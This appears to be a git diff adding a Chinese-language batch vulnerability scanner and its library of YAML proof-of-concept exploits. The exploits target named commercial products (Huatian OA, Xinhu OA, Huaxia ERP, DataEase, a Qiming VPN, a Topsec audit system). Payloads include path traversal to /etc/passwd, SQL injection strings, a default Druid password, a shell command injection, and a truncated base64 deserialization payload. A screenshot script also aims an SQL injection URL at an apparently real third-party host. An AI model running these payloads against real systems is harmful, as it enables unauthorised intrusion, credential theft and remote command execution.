ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZyAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GcwAAAAtnZXRfQ3VycmVudAoBSwAAAEMAAAAJcwAAAAk%2BAAAACXIAAAAGdgAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpBncAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQgAAAAKAUwAAABCAAAABngAAADGAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk%2BAAAACgk%2BAAAABnoAAAAQU3lzdGVtLkFjdGl2YXRvcgZ7AAAADkNyZWF0ZUluc3RhbmNlCgFNAAAAQwAAAAl7AAAACT4AAAAJegAAAAZ%2BAAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpBn8AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkIAAAACgFOAAAADwAAAAaAAAAAJlN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uQ29tbWFuZElEBAAAAAk6AAAAEE8AAAACAAAACYIAAAAICAAgAAAEggAAAAtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgICExPSdO4q0RGL%2BwCgyQ8m9wsLfW3lPHcqhM8jewcv5VJIqA7wqWA%3D&__VIEWSTATEGENERATOR=60AF4756 + +response: + path: "" + status-code: 200 + body: "IPv4" + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + 可造成服务器落入攻击者控制中。 diff --git a/poc/OA-Poc/htoa-downloadWpsFile-ReadFile.yaml b/poc/OA-Poc/htoa-downloadWpsFile-ReadFile.yaml new file mode 100644 index 0000000..5c90524 --- /dev/null +++ b/poc/OA-Poc/htoa-downloadWpsFile-ReadFile.yaml @@ -0,0 +1,32 @@ +keyword: 华天OA +name: 华天OA任意文件读取漏洞 +description: | + 华天动力OA是一款将先进的管理思想、管理模式和软件技术、网络技术相结台,为用户提供了低成本、高效能的协同办公和管理平台;华天动力OA downoadWposFile,jsp 接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。 +requests: # 为空代表默认或者不启用 + path: "/OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml" + method: GET + headers: + User-agent: + Content-length: + Accept: + Content-type: + Accept-Encoding: + Cookie: + Referer: + X-Forwarded-For: + body-raw: |- + # 如果需要发送请求体,在这里填写 + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + 造成网站文件以及服务器内文件泄露。 diff --git a/poc/OA-Poc/huaxiaERP-InfoLeak.yaml b/poc/OA-Poc/huaxiaERP-InfoLeak.yaml new file mode 100644 index 0000000..5394361 --- /dev/null +++ b/poc/OA-Poc/huaxiaERP-InfoLeak.yaml @@ -0,0 +1,26 @@ +keyword: 华夏ERP +name: 华夏ERP信息泄漏漏洞 +description: | # 下一行可填写漏洞描述 + 华夏ERPV3.3存在信息泄漏漏洞,可获取用户敏感信息。 +requests: # 为空代表默认或者不启用 + path: "/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList" + method: GET + headers: + Cookie: + X-Forwarded-For: + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "password" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 可获取用户敏感信息(如系统管理员用户名+密码+邮箱等)。 diff --git a/poc/OA-Poc/xinhu-index-SQL.yaml b/poc/OA-Poc/xinhu-index-SQL.yaml new file mode 100644 index 0000000..af90d58 --- /dev/null +++ b/poc/OA-Poc/xinhu-index-SQL.yaml @@ -0,0 +1,24 @@ +keyword: 信呼OA +name: 信呼OA SQL注入漏洞 +description: | # 下一行可填写漏洞描述 + 信呼OA办公系统是一款开源的且跨平台的办公系统。 +requests: # 为空代表默认或者不启用 + path: "/index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw==" + method: GET + headers: + X-Forwarded-For: + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: " " # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 diff --git a/poc/Other-Poc/DataEase-de2api-InfoLeak.yaml b/poc/Other-Poc/DataEase-de2api-InfoLeak.yaml new file mode 100644 index 0000000..0307031 --- /dev/null +++ b/poc/Other-Poc/DataEase-de2api-InfoLeak.yaml @@ -0,0 +1,29 @@ +keyword: DataEase +name: DataEase数据库配置信息泄露漏洞 +description: | # 下一行可填写漏洞描述 + DataEase存在数据库配置信息暴露漏洞 +requests: # 为空代表默认或者不启用 + path: "/de2api/engine/getEngine;.js" + method: GET + headers: + Accept: '*/*' + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 + Referer: https://www.baidu.com + Accept-Encoding: gzip, deflate + Connection: keep-alive + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "password" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + DataEase存在数据库配置信息暴露漏洞,可能导致数据库密码泄露,严重时可导致服务器被入侵。 diff --git a/poc/Other-Poc/hualei-getOrderTrackingNumber-SQL.yaml b/poc/Other-Poc/hualei-getOrderTrackingNumber-SQL.yaml new file mode 100644 index 0000000..2067d3e --- /dev/null +++ b/poc/Other-Poc/hualei-getOrderTrackingNumber-SQL.yaml @@ -0,0 +1,32 @@ +keyword: hualei +name: 华磊物流SQL注入漏洞 +description: | + 华磊科技物流系统 getOrderTrackingNumber.htm等接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 +requests: # 为空代表默认或者不启用 + path: "/getOrderTrackingNumber.htm?documentCode=1'and%0a1=user::integer--" + method: GET + headers: + User-agent: + Content-length: + Accept: + Content-type: + Accept-Encoding: + Cookie: + Referer: + X-Forwarded-For: + body-raw: |- + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "postgresql" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + 造成SQL数据库中数据泄露。 \ No newline at end of file diff --git a/poc/POC-draw.yaml b/poc/POC-draw.yaml new file mode 100644 index 0000000..49080e0 --- /dev/null +++ b/poc/POC-draw.yaml @@ -0,0 +1,29 @@ +keyword: # 此处填写漏洞关键词 +name: # 此处填写漏洞名称 +description: | # 下一行可填写漏洞描述 + +requests: # 为空代表默认或者不启用 + path: "" + method: + headers: + Accept: '*/*' + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 + Referer: https://www.baidu.com + Accept-Encoding: gzip, deflate + Connection: keep-alive + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + diff --git a/poc/SE-Poc/AuthServer-umweb-ReadFile.yaml b/poc/SE-Poc/AuthServer-umweb-ReadFile.yaml new file mode 100644 index 0000000..42a2464 --- /dev/null +++ b/poc/SE-Poc/AuthServer-umweb-ReadFile.yaml @@ -0,0 +1,29 @@ +keyword: Huawei Auth-Http Server +name: 华为Auth服务器任意文件读取 +description: | # 下一行可填写漏洞描述 + 华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。 +requests: # 为空代表默认或者不启用 + path: "/umweb/passwd" + method: GET + headers: + Accept: '*/*' + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 + Referer: https://www.baidu.com + Accept-Encoding: gzip, deflate + Connection: keep-alive + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "root" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。 diff --git a/poc/SE-Poc/Esafennet-druid-WeakPass.yaml b/poc/SE-Poc/Esafennet-druid-WeakPass.yaml new file mode 100644 index 0000000..50c8b97 --- /dev/null +++ b/poc/SE-Poc/Esafennet-druid-WeakPass.yaml @@ -0,0 +1,29 @@ +keyword: Esafenet +name: 亿赛通Druid弱口令 +description: | # 下一行可填写漏洞描述 + 亿赛通电子文档安全管理系统Druid弱口令漏洞 +requests: # 为空代表默认或者不启用 + path: "/CDGServer3/druid/submitLogin" + method: POST + headers: + Accept: '*/*' + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 + Referer: https://www.baidu.com + Accept-Encoding: gzip, deflate + Connection: keep-alive + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + loginUsername=druid&loginPassword=EstNet.Druid + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: " " # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 亿赛通电子文档安全管理系统Druid弱口令漏洞,攻击者可直接登录系统。 diff --git a/poc/SE-Poc/V5VPN-download-ReadFile.yaml b/poc/SE-Poc/V5VPN-download-ReadFile.yaml new file mode 100644 index 0000000..d65073d --- /dev/null +++ b/poc/SE-Poc/V5VPN-download-ReadFile.yaml @@ -0,0 +1,31 @@ +keyword: 天清汉马VPN +name: 天清汉马VPN接口download任意文件读取 +description: | + 启明星辰天清汉马VPN系统download接口处存在任意文件读取漏洞,获取服务器的敏感数据和配置信息,造成系统的不安全性,从而控制服务器 +requests: # 为空代表默认或者不启用 + path: "/vpn/user/download/client?ostype=../../../../../../../etc/passwd" + method: GET + headers: + User-agent: + Content-length: + Accept: + Content-type: + Accept-Encoding: + Cookie: + Referer: + X-Forwarded-For: + body-raw: |- + + +response: + path: "" + status-code: 200 + body: "root" + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + 数据库等高敏感度文件泄露。 diff --git a/poc/SE-Poc/iam-synRequest-RCE.yaml b/poc/SE-Poc/iam-synRequest-RCE.yaml new file mode 100644 index 0000000..98633e4 --- /dev/null +++ b/poc/SE-Poc/iam-synRequest-RCE.yaml @@ -0,0 +1,31 @@ +keyword: iam +name: 天融信运维安全审计系统远程命令执行漏洞 +description: | # 下一行可填写漏洞描述 + 天融信运维安全审计系统synRequest存在远程命令执行漏洞 +requests: # 为空代表默认或者不启用 + path: "/iam/synRequest.do;.login.jsp" + method: POST + headers: + Accept: '*/*' + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 + Referer: https://www.baidu.com + Accept-Encoding: gzip, deflate + Sec-Fetch-Dest: empty + Sec-Fetch-Mode: cors + Sec-Fetch-Site: same-site + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + method=trace_route&w=1&ip=127.0.0.1|echo%20`whoami`%3b&m=10 + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: " " # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 天融信运维安全审计系统synRequest存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器权限。 diff --git a/poc/nuclei-draw.yaml b/poc/nuclei-draw.yaml new file mode 100644 index 0000000..b087d81 --- /dev/null +++ b/poc/nuclei-draw.yaml @@ -0,0 +1,28 @@ +id: example-poc +info: + name: Example POC + author: Your Name + severity: medium + description: | + This is an example POC template. +requests: +- name: Example Request + method: GET + path: /vulnerable_endpoint + headers: + User-Agent: nuclei-scanner + body: | + { + "key": "value" + } + matchers: + - type: word + part: body + words: + - "Vulnerability Detected" + - type: status + status: 200 + - type: word + part: headers + words: + - "Content-Type: application/json" diff --git a/poc/框架名称-接口-漏洞类型.txt b/poc/框架名称-接口-漏洞类型.txt new file mode 100644 index 0000000..ffcc201 --- /dev/null +++ b/poc/框架名称-接口-漏洞类型.txt @@ -0,0 +1,6 @@ +ReadFile 任意文件读取漏洞 +DownloadFile 任意文件下载漏洞 +RCE 远程命令注入漏洞 +SQL SQL注入漏洞 +Deserialize 反序列化漏洞 +InfoLeak 敏感信息泄露漏洞 \ No newline at end of file diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..5473da1 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,8 @@ +requests +pyyaml +urllib3 +colorama +tldextract +python-docx +beautifulsoup4 +selenium diff --git a/screenshot.py b/screenshot.py new file mode 100644 index 0000000..21a6f4f --- /dev/null +++ b/screenshot.py @@ -0,0 +1,56 @@ +import webbrowser +import time +import os +import tldextract +from selenium import webdriver +from selenium.webdriver.firefox.service import Service as FirefoxService +from selenium.webdriver.firefox.options import Options + +def screenshot(url): + BrowserPath = r"C:\Program Files\Mozilla Firefox\firefox.exe" + GeckoDriverPath = r"./geckodriver.exe" + + webbrowser.register('firefox', None, webbrowser.BackgroundBrowser(BrowserPath)) + + options = Options() + options.binary_location = BrowserPath + + screenshot_dir = '.\\screenshots' + if not os.path.exists(screenshot_dir): + os.makedirs(screenshot_dir) + + service = FirefoxService(GeckoDriverPath) + driver = webdriver.Firefox(service=service, options=options) + + driver.set_page_load_timeout(10) + + try: + driver.get(url) + time.sleep(5) + except Exception as e: + print(f"无法生成{url}对应截图,请查看下载文件手动截图!") + driver.quit() + return None + + timestamp = str(int(time.time())) + domain = extract_root_domain(url) + screenshot_path = os.path.join(screenshot_dir, f"{domain}_{timestamp}.png") + + if driver.current_url != url: + # print(f"检测到下载链接: {url},即将跳过截图!") + driver.save_screenshot(screenshot_path) + print(f"已保存截图: {screenshot_path}") + else: + driver.save_screenshot(screenshot_path) + print(f"已保存截图: {screenshot_path}") + + driver.quit() + return screenshot_path + +def extract_root_domain(url): + extracted = tldextract.extract(url) + root_domain = f"{extracted.domain}.{extracted.suffix}" + return root_domain + +if __name__ == '__main__': + screenshot("http://ztb.qlgsh.cn:8001/api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1") diff --git a/urls.txt b/urls.txt new file mode 100644 index 0000000..e69de29 diff --git a/一键启动.bat b/一键启动.bat new file mode 100644 index 0000000..4534c29 --- /dev/null +++ b/一键启动.bat @@ -0,0 +1,9 @@ +@echo off +REM 设置Python脚本的路径 +set SCRIPT_PATH=./new_poc_tools.py --batch + +REM 运行Python脚本 +python %SCRIPT_PATH% + +REM 暂停,以便你可以看到脚本的输出 +pause diff --git a/使用说明.txt b/使用说明.txt new file mode 100644 index 0000000..fac2a16 --- /dev/null +++ b/使用说明.txt @@ -0,0 +1,5 @@ +目标地址:urls.txt +使用POC:MatchedPOC.txt + 使用前记得更改这两个文件 +POC示例模板在poc文件夹下,请根据此来更改 +本扫描器暂不支持时间检测和无回显检测。 \ No newline at end of file